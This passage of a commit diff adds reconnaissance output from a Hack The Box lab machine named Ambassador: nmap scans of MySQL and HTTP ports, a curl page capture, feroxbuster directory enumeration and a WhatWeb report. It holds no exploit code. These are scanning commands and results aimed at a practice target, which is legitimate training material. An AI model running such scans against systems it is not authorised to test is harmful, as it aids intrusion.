<elem>chacha20-poly1305@openssh.com</elem>
<elem>aes128-ctr</elem>
<elem>aes192-ctr</elem>
<elem>aes256-ctr</elem>
<elem>aes128-gcm@openssh.com</elem>
<elem>aes256-gcm@openssh.com</elem>
</table>
<table key="mac_algorithms">
<elem>umac-64-etm@openssh.com</elem>
<elem>umac-128-etm@openssh.com</elem>
<elem>hmac-sha2-256-etm@openssh.com</elem>
<elem>hmac-sha2-512-etm@openssh.com</elem>
<elem>hmac-sha1-etm@openssh.com</elem>
<elem>umac-64@openssh.com</elem>
<elem>umac-128@openssh.com</elem>
<elem>hmac-sha2-256</elem>
<elem>hmac-sha2-512</elem>
<elem>hmac-sha1</elem>
</table>
<table key="compression_algorithms">
<elem>none</elem>
<elem>zlib@openssh.com</elem>
</table>
</script></port>
</ports>
<times srtt="57850" rttvar="57850" to="289250"/>
</host>
<taskbegin task="NSE" time="1674563265"/>
<taskend task="NSE" time="1674563265"/>
<taskbegin task="NSE" time="1674563265"/>
<taskend task="NSE" time="1674563265"/>
<runstats><finished time="1674563265" timestr="Tue Jan 24 07:27:45 2023" summary="Nmap done at Tue Jan 24 07:27:45 2023; 1 IP address (1 host up) scanned in 1.87 seconds" elapsed="1.87" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>

23
HTB/ambassador/results/10.10.11.183/scans/tcp3306/tcp_3306_mysql_nmap.txt Normal file
View File

@@ -0,0 +1,23 @@
# Nmap 7.93 scan initiated Tue Jan 24 07:27:43 2023 as: nmap -vv --reason -Pn -T4 -sV -p 3306 "--script=banner,(mysql* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp3306/tcp_3306_mysql_nmap.txt -oX /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp3306/xml/tcp_3306_mysql_nmap.xml 10.10.11.183
Nmap scan report for ambassador.htb (10.10.11.183)
Host is up, received user-set (0.038s latency).
Scanned at 2023-01-24 07:27:44 EST for 108s
PORT STATE SERVICE REASON VERSION
3306/tcp open mysql syn-ack MySQL 8.0.30-0ubuntu0.20.04.2
| mysql-info:
| Protocol: 10
| Version: 8.0.30-0ubuntu0.20.04.2
| Thread ID: 61
| Capabilities flags: 65535
| Some Capabilities: Support41Auth, Speaks41ProtocolOld, LongPassword, ConnectWithDatabase, ODBCClient, SupportsTransactions, LongColumnFlag, FoundRows, SwitchToSSLAfterHandshake, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, Speaks41ProtocolNew, IgnoreSigpipes, DontAllowDatabaseTableColumn, InteractiveClient, SupportsCompression, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
| Status: Autocommit
| Salt: ; E\x18{q7/Y&NBxIZ\x132(&Y
|_ Auth Plugin Name: caching_sha2_password
| banner: [\x00\x00\x00\x0A8.0.30-0ubuntu0.20.04.2\x00?\x00\x00\x00"Rcm%P
| \x19Z\x00\xFF\xFF\xFF\x02\x00\xFF\xDF\x15\x00\x00\x00\x00\x00\x00\x00\x
|_00\x00\x009i1\,\x1C`P\x02g{+\x00caching_sha2_password\x00
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 24 07:29:32 2023 -- 1 IP address (1 host up) scanned in 108.73 seconds

72
HTB/ambassador/results/10.10.11.183/scans/tcp3306/xml/tcp_3306_mysql_nmap.xml Normal file
View File

@@ -0,0 +1,72 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Tue Jan 24 07:27:43 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -p 3306 &quot;-&#45;script=banner,(mysql* or ssl*) and not (brute or broadcast or dos or external or fuzzer)&quot; -oN /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp3306/tcp_3306_mysql_nmap.txt -oX /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp3306/xml/tcp_3306_mysql_nmap.xml 10.10.11.183 -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -p 3306 &quot;-&#45;script=banner,(mysql* or ssl*) and not (brute or broadcast or dos or external or fuzzer)&quot; -oN /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp3306/tcp_3306_mysql_nmap.txt -oX /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp3306/xml/tcp_3306_mysql_nmap.xml 10.10.11.183" start="1674563263" startstr="Tue Jan 24 07:27:43 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="connect" protocol="tcp" numservices="1" services="3306"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1674563264"/>
<taskend task="NSE" time="1674563264"/>
<taskbegin task="NSE" time="1674563264"/>
<taskend task="NSE" time="1674563264"/>
<taskbegin task="NSE" time="1674563264"/>
<taskend task="NSE" time="1674563264"/>
<taskbegin task="Connect Scan" time="1674563264"/>
<taskend task="Connect Scan" time="1674563264" extrainfo="1 total ports"/>
<taskbegin task="Service scan" time="1674563264"/>
<taskend task="Service scan" time="1674563274" extrainfo="1 service on 1 host"/>
<taskbegin task="NSE" time="1674563274"/>
<taskend task="NSE" time="1674563283"/>
<taskbegin task="NSE" time="1674563283"/>
<taskprogress task="NSE" time="1674563314" percent="66.67" remaining="16" etc="1674563329"/>
<taskprogress task="NSE" time="1674563344" percent="80.95" remaining="15" etc="1674563358"/>
<taskend task="NSE" time="1674563365"/>
<taskbegin task="NSE" time="1674563365"/>
<taskend task="NSE" time="1674563372"/>
<host starttime="1674563264" endtime="1674563372"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="10.10.11.183" addrtype="ipv4"/>
<hostnames>
<hostname name="ambassador.htb" type="PTR"/>
</hostnames>
<ports><port protocol="tcp" portid="3306"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="mysql" product="MySQL" version="8.0.30-0ubuntu0.20.04.2" method="probed" conf="10"><cpe>cpe:/a:mysql:mysql:8.0.30-0ubuntu0.20.04.2</cpe></service><script id="mysql-info" output="&#xa; Protocol: 10&#xa; Version: 8.0.30-0ubuntu0.20.04.2&#xa; Thread ID: 61&#xa; Capabilities flags: 65535&#xa; Some Capabilities: Support41Auth, Speaks41ProtocolOld, LongPassword, ConnectWithDatabase, ODBCClient, SupportsTransactions, LongColumnFlag, FoundRows, SwitchToSSLAfterHandshake, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, Speaks41ProtocolNew, IgnoreSigpipes, DontAllowDatabaseTableColumn, InteractiveClient, SupportsCompression, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins&#xa; Status: Autocommit&#xa; Salt: ; E\x18{q7/Y&amp;NBxIZ\x132(&amp;Y&#xa; Auth Plugin Name: caching_sha2_password"><elem key="Protocol">10</elem>
<elem key="Version">8.0.30-0ubuntu0.20.04.2</elem>
<elem key="Thread ID">61</elem>
<elem key="Capabilities flags">65535</elem>
<table key="Some Capabilities">
<elem>Support41Auth</elem>
<elem>Speaks41ProtocolOld</elem>
<elem>LongPassword</elem>
<elem>ConnectWithDatabase</elem>
<elem>ODBCClient</elem>
<elem>SupportsTransactions</elem>
<elem>LongColumnFlag</elem>
<elem>FoundRows</elem>
<elem>SwitchToSSLAfterHandshake</elem>
<elem>IgnoreSpaceBeforeParenthesis</elem>
<elem>SupportsLoadDataLocal</elem>
<elem>Speaks41ProtocolNew</elem>
<elem>IgnoreSigpipes</elem>
<elem>DontAllowDatabaseTableColumn</elem>
<elem>InteractiveClient</elem>
<elem>SupportsCompression</elem>
<elem>SupportsMultipleStatments</elem>
<elem>SupportsMultipleResults</elem>
<elem>SupportsAuthPlugins</elem>
</table>
<elem key="Status">Autocommit</elem>
<elem key="Salt">; E\x18{q7/Y&amp;NBxIZ\x132(&amp;Y</elem>
<elem key="Auth Plugin Name">caching_sha2_password</elem>
</script><script id="banner" output="[\x00\x00\x00\x0A8.0.30-0ubuntu0.20.04.2\x00?\x00\x00\x00&quot;Rcm%P&#xa;\x19Z\x00\xFF\xFF\xFF\x02\x00\xFF\xDF\x15\x00\x00\x00\x00\x00\x00\x00\x&#xa;00\x00\x009i1\,\x1C`P\x02g{+\x00caching_sha2_password\x00"/></port>
</ports>
<times srtt="38384" rttvar="38384" to="191920"/>
</host>
<taskbegin task="NSE" time="1674563372"/>
<taskend task="NSE" time="1674563372"/>
<taskbegin task="NSE" time="1674563372"/>
<taskend task="NSE" time="1674563372"/>
<taskbegin task="NSE" time="1674563372"/>
<taskend task="NSE" time="1674563372"/>
<runstats><finished time="1674563372" timestr="Tue Jan 24 07:29:32 2023" summary="Nmap done at Tue Jan 24 07:29:32 2023; 1 IP address (1 host up) scanned in 108.73 seconds" elapsed="108.73" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>

0
HTB/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_ambassador.htb_vhosts_subdomains-top1million-110000.txt Normal file
View File

165
HTB/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_curl.html Normal file
View File

@@ -0,0 +1,165 @@
HTTP/1.1 200 OK
Date: Tue, 24 Jan 2023 12:27:44 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Fri, 02 Sep 2022 01:37:04 GMT
ETag: "e46-5e7a7c4652f79"
Accept-Ranges: bytes
Content-Length: 3654
Vary: Accept-Encoding
Content-Type: text/html
<!DOCTYPE html>
<html lang="en-us">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title>Ambassador Development Server</title>
<meta name="viewport" content="width=device-width,minimum-scale=1">
<meta name="description" content="">
<meta name="generator" content="Hugo 0.94.2" />
<meta name="robots" content="noindex, nofollow">
<link rel="stylesheet" href="/ananke/css/main.min.css" >
<link href="/index.xml" rel="alternate" type="application/rss+xml" title="Ambassador Development Server" />
<link href="/index.xml" rel="feed" type="application/rss+xml" title="Ambassador Development Server" />
<meta property="og:title" content="Ambassador Development Server" />
<meta property="og:description" content="" />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://example.org/" />
<meta itemprop="name" content="Ambassador Development Server">
<meta itemprop="description" content=""><meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Ambassador Development Server"/>
<meta name="twitter:description" content=""/>
</head>
<body class="ma0 avenir bg-near-white">
<header>
<div class="pb3-m pb6-l bg-black">
<nav class="pv3 ph3 ph4-ns" role="navigation">
<div class="flex-l justify-between items-center center">
<a href="/" class="f3 fw2 hover-white no-underline white-90 dib">
Ambassador Development Server
</a>
<div class="flex-l items-center">
<div class="ananke-socials">
</div>
</div>
</div>
</nav>
<div class="tc-l pv3 ph3 ph4-ns">
<h1 class="f2 f-subheadline-l fw2 light-silver mb0 lh-title">
Ambassador Development Server
</h1>
</div>
</div>
</header>
<main class="pb7" role="main">
<article class="cf ph3 ph5-l pv3 pv4-l f4 tc-l center measure-wide lh-copy mid-gray">
</article>
<div class="pa3 pa4-ns w-100 w-70-ns center">
<h1 class="flex-none">
Recent Posts
</h1>
<section class="w-100 mw8">
<div class="relative w-100 mb4">
<article class="bb b--black-10">
<div class="db pv4 ph3 ph0-l no-underline dark-gray">
<div class="flex flex-column flex-row-ns">
<div class="blah w-100">
<h1 class="f3 fw1 athelas mt0 lh-title">
<a href="/posts/welcome-to-the-ambassador-development-server/" class="color-inherit dim link">
Welcome to the Ambassador Development Server
</a>
</h1>
<div class="f6 f5-l lh-copy nested-copy-line-height nested-links">
Hi there! This server exists to provide developers at Ambassador with a standalone development environment. When you start as a developer at Ambassador, you will be assigned a development server of your own to use.
Connecting to this machine Use the developer account to SSH, DevOps will give you the password.
</div>
<a href="/posts/welcome-to-the-ambassador-development-server/" class="ba b--moon-gray bg-light-gray br2 color-inherit dib f7 hover-bg-moon-gray link mt2 ph2 pv1">read more</a>
</div>
</div>
</div>
</article>
</div>
</section>
</div>
</main>
<footer>
<div>
<p>
Ambassador Inc.
</p>
</div>
</footer>
</body>
</html>

33
HTB/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt Normal file
View File

@@ -0,0 +1,33 @@
200 GET 1l 242w 75263c http://10.10.11.183/ananke/css/main.min.css
200 GET 21l 101w 1230c http://10.10.11.183/index.xml
200 GET 155l 305w 3654c http://10.10.11.183/
403 GET 9l 28w 277c http://10.10.11.183/.html
403 GET 9l 28w 277c http://10.10.11.183/.hta
403 GET 9l 28w 277c http://10.10.11.183/.htpasswd
403 GET 9l 28w 277c http://10.10.11.183/.htaccess
403 GET 9l 28w 277c http://10.10.11.183/.htpasswd.txt
403 GET 9l 28w 277c http://10.10.11.183/.hta.txt
403 GET 9l 28w 277c http://10.10.11.183/.htaccess.txt
403 GET 9l 28w 277c http://10.10.11.183/.htpasswd.html
403 GET 9l 28w 277c http://10.10.11.183/.hta.html
403 GET 9l 28w 277c http://10.10.11.183/.htaccess.html
403 GET 9l 28w 277c http://10.10.11.183/.htpasswd.php
403 GET 9l 28w 277c http://10.10.11.183/.hta.php
403 GET 9l 28w 277c http://10.10.11.183/.htaccess.php
403 GET 9l 28w 277c http://10.10.11.183/.hta.asp
403 GET 9l 28w 277c http://10.10.11.183/.htpasswd.asp
403 GET 9l 28w 277c http://10.10.11.183/.htaccess.asp
403 GET 9l 28w 277c http://10.10.11.183/.htpasswd.aspx
403 GET 9l 28w 277c http://10.10.11.183/.hta.aspx
403 GET 9l 28w 277c http://10.10.11.183/.htaccess.aspx
403 GET 9l 28w 277c http://10.10.11.183/.htpasswd.jsp
403 GET 9l 28w 277c http://10.10.11.183/.hta.jsp
403 GET 9l 28w 277c http://10.10.11.183/.htaccess.jsp
200 GET 92l 143w 1793c http://10.10.11.183/404.html
301 GET 9l 28w 317c http://10.10.11.183/categories => http://10.10.11.183/categories/
301 GET 9l 28w 313c http://10.10.11.183/images => http://10.10.11.183/images/
200 GET 155l 305w 3654c http://10.10.11.183/index.html
301 GET 9l 28w 312c http://10.10.11.183/posts => http://10.10.11.183/posts/
403 GET 9l 28w 277c http://10.10.11.183/server-status
200 GET 18l 22w 645c http://10.10.11.183/sitemap.xml
301 GET 9l 28w 311c http://10.10.11.183/tags => http://10.10.11.183/tags/

108
HTB/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_nmap.txt Normal file
View File

@@ -0,0 +1,108 @@
# Nmap 7.93 scan initiated Tue Jan 24 07:27:43 2023 as: nmap -vv --reason -Pn -T4 -sV -p 80 "--script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_nmap.txt -oX /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/xml/tcp_80_http_nmap.xml 10.10.11.183
Nmap scan report for ambassador.htb (10.10.11.183)
Host is up, received user-set (0.036s latency).
Scanned at 2023-01-24 07:27:44 EST for 18s
Bug in http-security-headers: no string output.
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-mobileversion-checker: No mobile version detected.
|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
|_http-errors: Couldn't find any error pages.
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
|_http-referer-checker: Couldn't find any cross-domain scripts.
|_http-malware-host: Host appears to be clean
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-generator: Hugo 0.94.2
|_http-chrono: Request times for /; avg: 196.43ms; min: 171.38ms; max: 209.87ms
|_http-date: Tue, 24 Jan 2023 12:27:51 GMT; 0s from local time.
| http-feed:
| Spidering limited to: maxpagecount=40; withinhost=ambassador.htb
| Found the following feeds:
|_ RSS (version 2.0): http://ambassador.htb:80/index.xml
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-useragent-tester:
| Status for browser useragent: 200
| Allowed User Agents:
| Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
| libwww
| lwp-trivial
| libcurl-agent/1.0
| PHP/
| Python-urllib/2.5
| GT::WWW
| Snoopy
| MFC_Tear_Sample
| HTTP::Lite
| PHPCrawl
| URI::Fetch
| Zend_Http_Client
| http client
| PECL::HTTP
| Wget/1.13.4 (linux-gnu)
|_ WWW-Mechanize/1.34
|_http-fetch: Please enter the complete path of the directory to save data in.
| http-vhosts:
|_128 names had status 200
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
| http-sitemap-generator:
| Directory structure:
| /
| Other: 1; xml: 1
| /ananke/css/
| css: 1
| /posts/welcome-to-the-ambassador-development-server/
| Other: 1
| Longest directory structure:
| Depth: 2
| Dir: /posts/welcome-to-the-ambassador-development-server/
| Total files found (by extension):
|_ Other: 2; css: 1; xml: 1
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
|_http-title: Ambassador Development Server
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-comments-displayer:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=ambassador.htb
|
| Path: http://ambassador.htb:80/ananke/css/main.min.css
| Line number: 1
| Comment:
| /*!normalize.css v8.0.0 | MIT License | github.com/necolas/normalize.css*/
|
| Path: http://ambassador.htb:80/ananke/css/main.min.css
| Line number: 1
| Comment:
| /*!TACHYONS v4.12.0 | http://tachyons.io*/
|
| Path: http://ambassador.htb:80/ananke/css/main.min.css
| Line number: 1
| Comment:
|_ /*!TACHYONS v4.9.1 | http://tachyons.io*/
|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit=<number|all> for deeper analysis)
| http-internal-ip-disclosure:
|_ Internal IP Leaked: 127.0.1.1
| http-headers:
| Date: Tue, 24 Jan 2023 12:27:52 GMT
| Server: Apache/2.4.41 (Ubuntu)
| Last-Modified: Fri, 02 Sep 2022 01:37:04 GMT
| ETag: "e46-5e7a7c4652f79"
| Accept-Ranges: bytes
| Content-Length: 3654
| Vary: Accept-Encoding
| Connection: close
| Content-Type: text/html
|
|_ (Request type: HEAD)
| http-php-version: Logo query returned unknown hash 4e8656a1e2c09ff4135b58519f82a327
|_Credits query returned unknown hash 4e8656a1e2c09ff4135b58519f82a327
|_http-config-backup: ERROR: Script execution failed (use -d to debug)
|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-enum:
|_ /images/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 24 07:28:02 2023 -- 1 IP address (1 host up) scanned in 18.76 seconds

BIN
HTB/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_screenshot.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 5.0 MiB

69
HTB/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_whatweb.txt Normal file
View File

@@ -0,0 +1,69 @@
WhatWeb report for http://10.10.11.183:80
Status : 200 OK
Title : Ambassador Development Server
IP : 10.10.11.183
Country : RESERVED, ZZ
Summary : Apache[2.4.41], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], MetaGenerator[Hugo 0.94.2], Open-Graph-Protocol[website], X-UA-Compatible[IE=edge]
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.4.41 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ HTML5 ]
HTML version 5, detected by the doctype declaration
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Ubuntu Linux
String : Apache/2.4.41 (Ubuntu) (from server string)
[ MetaGenerator ]
This plugin identifies meta generator tags and extracts its
value.
String : Hugo 0.94.2
[ Open-Graph-Protocol ]
The Open Graph protocol enables you to integrate your Web
pages into the social graph. It is currently designed for
Web pages representing profiles of real-world things .
things like movies, sports teams, celebrities, and
restaurants. Including Open Graph tags on your Web page,
makes your page equivalent to a Facebook Page.
Version : website
[ X-UA-Compatible ]
This plugin retrieves the X-UA-Compatible value from the
HTTP header and meta http-equiv tag. - More Info:
http://msdn.microsoft.com/en-us/library/cc817574.aspx
String : IE=edge
HTTP Headers:
HTTP/1.1 200 OK
Date: Tue, 24 Jan 2023 12:27:48 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Fri, 02 Sep 2022 01:37:04 GMT
ETag: "e46-5e7a7c4652f79-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1310
Connection: close
Content-Type: text/html

74
HTB/ambassador/results/10.10.11.183/scans/tcp80/xml/tcp_80_http_nmap.xml Normal file
View File

@@ -0,0 +1,74 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Tue Jan 24 07:27:43 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -p 80 &quot;-&#45;script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)&quot; -oN /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_nmap.txt -oX /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/xml/tcp_80_http_nmap.xml 10.10.11.183 -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -p 80 &quot;-&#45;script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)&quot; -oN /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_nmap.txt -oX /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/xml/tcp_80_http_nmap.xml 10.10.11.183" start="1674563263" startstr="Tue Jan 24 07:27:43 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="connect" protocol="tcp" numservices="1" services="80"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1674563264"/>
<taskend task="NSE" time="1674563264"/>
<taskbegin task="NSE" time="1674563264"/>
<taskend task="NSE" time="1674563264"/>
<taskbegin task="NSE" time="1674563264"/>
<taskend task="NSE" time="1674563264"/>
<taskbegin task="Connect Scan" time="1674563264"/>
<taskend task="Connect Scan" time="1674563264" extrainfo="1 total ports"/>
<taskbegin task="Service scan" time="1674563264"/>
<taskend task="Service scan" time="1674563270" extrainfo="1 service on 1 host"/>
<taskbegin task="NSE" time="1674563270"/>
<taskend task="NSE" time="1674563282"/>
<taskbegin task="NSE" time="1674563282"/>
<taskend task="NSE" time="1674563282"/>
<taskbegin task="NSE" time="1674563282"/>
<taskend task="NSE" time="1674563282"/>
<host starttime="1674563264" endtime="1674563282"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="10.10.11.183" addrtype="ipv4"/>
<hostnames>
<hostname name="ambassador.htb" type="PTR"/>
</hostnames>
<ports><port protocol="tcp" portid="80"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="http" product="Apache httpd" version="2.4.41" extrainfo="(Ubuntu)" method="probed" conf="10"><cpe>cpe:/a:apache:http_server:2.4.41</cpe></service><script id="http-mobileversion-checker" output="No mobile version detected."/><script id="http-devframework" output="Couldn&apos;t determine the underlying framework or CMS. Try increasing &apos;httpspider.maxpagecount&apos; value to spider more pages."/><script id="http-errors" output="Couldn&apos;t find any error pages."/><script id="http-litespeed-sourcecode-download" output="Request with null byte did not work. This web server might not be vulnerable"/><script id="http-referer-checker" output="Couldn&apos;t find any cross-domain scripts."/><script id="http-malware-host" output="Host appears to be clean"/><script id="http-csrf" output="Couldn&apos;t find any CSRF vulnerabilities."/><script id="http-generator" output="Hugo 0.94.2"/><script id="http-chrono" output="Request times for /; avg: 196.43ms; min: 171.38ms; max: 209.87ms"/><script id="http-date" output="Tue, 24 Jan 2023 12:27:51 GMT; 0s from local time."><elem key="date">2023-01-24T12:27:51+00:00</elem>
<elem key="delta">0.0</elem>
</script><script id="http-feed" output="&#xa;Spidering limited to: maxpagecount=40; withinhost=ambassador.htb&#xa; Found the following feeds: &#xa; RSS (version 2.0): http://ambassador.htb:80/index.xml&#xa;"/><script id="http-jsonp-detection" output="Couldn&apos;t find any JSONP endpoints."/><script id="http-dombased-xss" output="Couldn&apos;t find any DOM based XSS."/><script id="http-useragent-tester" output="&#xa; Status for browser useragent: 200&#xa; Allowed User Agents: &#xa; Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)&#xa; libwww&#xa; lwp-trivial&#xa; libcurl-agent/1.0&#xa; PHP/&#xa; Python-urllib/2.5&#xa; GT::WWW&#xa; Snoopy&#xa; MFC_Tear_Sample&#xa; HTTP::Lite&#xa; PHPCrawl&#xa; URI::Fetch&#xa; Zend_Http_Client&#xa; http client&#xa; PECL::HTTP&#xa; Wget/1.13.4 (linux-gnu)&#xa; WWW-Mechanize/1.34"><elem key="Status for browser useragent">200</elem>
<table key="Allowed User Agents">
<elem>Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)</elem>
<elem>libwww</elem>
<elem>lwp-trivial</elem>
<elem>libcurl-agent/1.0</elem>
<elem>PHP/</elem>
<elem>Python-urllib/2.5</elem>
<elem>GT::WWW</elem>
<elem>Snoopy</elem>
<elem>MFC_Tear_Sample</elem>
<elem>HTTP::Lite</elem>
<elem>PHPCrawl</elem>
<elem>URI::Fetch</elem>
<elem>Zend_Http_Client</elem>
<elem>http client</elem>
<elem>PECL::HTTP</elem>
<elem>Wget/1.13.4 (linux-gnu)</elem>
<elem>WWW-Mechanize/1.34</elem>
</table>
</script><script id="http-fetch" output="Please enter the complete path of the directory to save data in."><elem key="ERROR">Please enter the complete path of the directory to save data in.</elem>
</script><script id="http-vhosts" output="&#xa;128 names had status 200"/><script id="http-methods" output="&#xa; Supported Methods: GET POST OPTIONS HEAD"><table key="Supported Methods">
<elem>GET</elem>
<elem>POST</elem>
<elem>OPTIONS</elem>
<elem>HEAD</elem>
</table>
</script><script id="http-sitemap-generator" output="&#xa; Directory structure:&#xa; /&#xa; Other: 1; xml: 1&#xa; /ananke/css/&#xa; css: 1&#xa; /posts/welcome-to-the-ambassador-development-server/&#xa; Other: 1&#xa; Longest directory structure:&#xa; Depth: 2&#xa; Dir: /posts/welcome-to-the-ambassador-development-server/&#xa; Total files found (by extension):&#xa; Other: 2; css: 1; xml: 1&#xa;"/><script id="http-wordpress-users" output="[Error] Wordpress installation was not found. We couldn&apos;t find wp-login.php"/><script id="http-title" output="Ambassador Development Server"><elem key="title">Ambassador Development Server</elem>
</script><script id="http-stored-xss" output="Couldn&apos;t find any stored XSS vulnerabilities."/><script id="http-comments-displayer" output="&#xa;Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=ambassador.htb&#xa; &#xa; Path: http://ambassador.htb:80/ananke/css/main.min.css&#xa; Line number: 1&#xa; Comment: &#xa; /*!normalize.css v8.0.0 | MIT License | github.com/necolas/normalize.css*/&#xa; &#xa; Path: http://ambassador.htb:80/ananke/css/main.min.css&#xa; Line number: 1&#xa; Comment: &#xa; /*!TACHYONS v4.12.0 | http://tachyons.io*/&#xa; &#xa; Path: http://ambassador.htb:80/ananke/css/main.min.css&#xa; Line number: 1&#xa; Comment: &#xa; /*!TACHYONS v4.9.1 | http://tachyons.io*/&#xa;"/><script id="http-wordpress-enum" output="Nothing found amongst the top 100 resources,use -&#45;script-args search-limit=&lt;number|all&gt; for deeper analysis)"/><script id="http-internal-ip-disclosure" output="&#xa; Internal IP Leaked: 127.0.1.1"><elem key="Internal IP Leaked">127.0.1.1</elem>
</script><script id="http-headers" output="&#xa; Date: Tue, 24 Jan 2023 12:27:52 GMT&#xa; Server: Apache/2.4.41 (Ubuntu)&#xa; Last-Modified: Fri, 02 Sep 2022 01:37:04 GMT&#xa; ETag: &quot;e46-5e7a7c4652f79&quot;&#xa; Accept-Ranges: bytes&#xa; Content-Length: 3654&#xa; Vary: Accept-Encoding&#xa; Connection: close&#xa; Content-Type: text/html&#xa; &#xa; (Request type: HEAD)&#xa;"/><script id="http-php-version" output="Logo query returned unknown hash 4e8656a1e2c09ff4135b58519f82a327&#xa;Credits query returned unknown hash 4e8656a1e2c09ff4135b58519f82a327"/><script id="http-security-headers" output=""></script><script id="http-config-backup" output="ERROR: Script execution failed (use -d to debug)"/><script id="http-drupal-enum" output="Nothing found amongst the top 100 resources,use -&#45;script-args number=&lt;number|all&gt; for deeper analysis)"/><script id="http-server-header" output="Apache/2.4.41 (Ubuntu)"><elem>Apache/2.4.41 (Ubuntu)</elem>
</script><script id="http-enum" output="&#xa; /images/: Potentially interesting directory w/ listing on &apos;apache/2.4.41 (ubuntu)&apos;&#xa;"/></port>
</ports>
<times srtt="35950" rttvar="35950" to="179750"/>
</host>
<taskbegin task="NSE" time="1674563282"/>
<taskend task="NSE" time="1674563282"/>
<taskbegin task="NSE" time="1674563282"/>
<taskend task="NSE" time="1674563282"/>
<taskbegin task="NSE" time="1674563282"/>
<taskend task="NSE" time="1674563282"/>
